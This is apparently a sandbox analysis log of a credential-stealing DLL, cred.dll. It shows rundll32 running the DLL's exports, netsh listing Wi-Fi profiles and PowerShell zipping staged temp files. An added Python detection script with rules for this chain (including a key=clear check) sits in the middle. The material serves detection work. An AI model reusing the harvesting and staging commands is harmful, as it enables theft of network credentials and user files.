    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cred.dll",#1
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred.dll,Main
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred.dll",#1
    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred.dll,Save
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred.dll",Main
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred.dll",Save
    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cred.dll",#1
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred.dll,Main
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cred.dll,Save
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred.dll",Main
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred.dll",Save
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred.dll",#1
    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
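The process tree above is the chain a detection engineer would key on: loaddll32/rundll32 invoking the Main and Save exports of a DLL sitting on the user's Desktop, rundll32 spawning `netsh wlan show profiles`, and rundll32 spawning `powershell -Command Compress-Archive` over `%TEMP%\_Files_`. The Python below is an added example and is not part of the Joe Sandbox report or of the sample: it scans constructed Sysmon Event ID 1-style process-creation records, modelled on the "Process created" lines of this report, and flags those three parent/child relationships. The record shape, the rule names and the benign control records are assumptions made for the example; the `key=clear` check in the WLAN rule covers the follow-up netsh invocation that usually accompanies profile enumeration but is not shown in this report.

```python
"""Flag the cred.dll process chain in process-creation telemetry (added example, not from the report)."""
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """Minimal Sysmon Event ID 1 / Security 4688 style record (assumed shape for this example)."""
    parent_image: str
    image: str
    command_line: str


# Constructed records modelled on the report's "Process created" lines, followed by
# three benign controls (an operator zipping a folder, interactive netsh use) that must not fire.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(r"C:\Windows\System32\loaddll32.exe", r"C:\Windows\SysWOW64\rundll32.exe",
              r"rundll32.exe C:\Users\user\Desktop\cred.dll,Main"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\rundll32.exe",
              r'rundll32.exe "C:\Users\user\Desktop\cred.dll",#1'),
    ProcEvent(r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\SysWOW64\netsh.exe",
              r"netsh wlan show profiles"),
    ProcEvent(r"C:\Windows\SysWOW64\rundll32.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' "
              r"-DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -Command Compress-Archive -Path 'C:\Users\user\Documents\report' "
              r"-DestinationPath 'C:\Users\user\Documents\report.zip'"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\netsh.exe", r"netsh interface show interface"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\netsh.exe", r"netsh wlan show profiles"),
]

USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(desktop|downloads|appdata)\\", re.I)
TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\", re.I)
# Proxy-execution binaries that have no business enumerating Wi-Fi profiles (assumed list).
SCRIPT_HOSTS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}


def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rundll32_user_dll(ev: ProcEvent) -> bool:
    """rundll32 calling an export (by name or #ordinal) of a DLL in a user-writable directory."""
    if _name(ev.image) != "rundll32.exe":
        return False
    m = re.search(r'"?([^"\s]+\.dll)"?\s*,\s*(#\d+|\w+)', ev.command_line, re.I)
    return bool(m and USER_WRITABLE.search(m.group(1)))


def wlan_profile_harvest(ev: ProcEvent) -> bool:
    """netsh wlan profile enumeration spawned by a script host, or any key=clear dump."""
    if _name(ev.image) != "netsh.exe":
        return False
    cmd = ev.command_line.lower()
    if not re.search(r"\bwlan\s+show\s+profiles?\b", cmd):
        return False
    return _name(ev.parent_image) in SCRIPT_HOSTS or "key=clear" in cmd


def temp_staging_archive(ev: ProcEvent) -> bool:
    """Compress-Archive launched by rundll32 with its source under %TEMP% (exfiltration staging)."""
    if _name(ev.image) != "powershell.exe" or not re.search(r"compress-archive", ev.command_line, re.I):
        return False
    src = re.search(r"-Path\s+['\"]?([^'\"\s]+)", ev.command_line, re.I)
    return _name(ev.parent_image) == "rundll32.exe" and bool(src and TEMP_DIR.search(src.group(1)))


RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("rundll32_user_dll", rundll32_user_dll),
    ("wlan_profile_harvest", wlan_profile_harvest),
    ("temp_staging_archive", temp_staging_archive),
]


def scan(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """Return (rule name, command line) for every record that matches a rule."""
    return [(name, ev.command_line) for ev in events for name, pred in RULES if pred(ev)]


if __name__ == "__main__":
    for rule, cmd in scan(SAMPLE_EVENTS):
        print(f"{rule:22} {cmd}")
```

The three rules are deliberately keyed on parent/child relationships rather than on the file name cred.dll or the zip name, both of which the operator controls; the benign controls show that an administrator running Compress-Archive from Explorer or typing netsh at a prompt does not trip them.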
Source: C:\Windows\System32\loaddll32.exe | Section loaded: apphelp.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: wininet.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: msasn1.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: wldp.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasapi32.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mfc42u.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: authfwcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpolicyiomgr.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: firewallapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwbase.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcmonitor.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3cfg.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3api.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: onex.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappprxy.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: hnetmon.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netshell.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nlaapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netsetupapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netiohlp.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcsvc.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshhttp.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: httpapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshipsec.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: activeds.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: polstore.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winipsec.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshwfp.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cabinet.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2pnetsh.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2p.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rpcnsh.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: whhelper.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlancfg.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlanapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wshelper.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wevtapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: peerdistsh.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wcmapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rmclient.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mobilenetworking.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: slc.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: sppc.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ktmw32.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprmsg.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasapi32.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mfc42u.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: authfwcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpolicyiomgr.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: firewallapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwbase.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcmonitor.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3cfg.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3api.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: onex.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappprxy.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: hnetmon.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netshell.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nlaapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netsetupapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netiohlp.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcsvc.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshhttp.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: httpapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshipsec.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: activeds.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: polstore.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winipsec.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshwfp.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cabinet.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2pnetsh.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2p.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rpcnsh.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: whhelper.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlancfg.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlanapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wshelper.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wevtapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: peerdistsh.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wcmapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rmclient.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mobilenetworking.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: slc.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: sppc.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ktmw32.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprmsg.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: authfwcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpolicyiomgr.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: firewallapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwbase.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcmonitor.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3cfg.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3api.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: onex.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappprxy.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: hnetmon.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netshell.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nlaapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netsetupapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netiohlp.dll
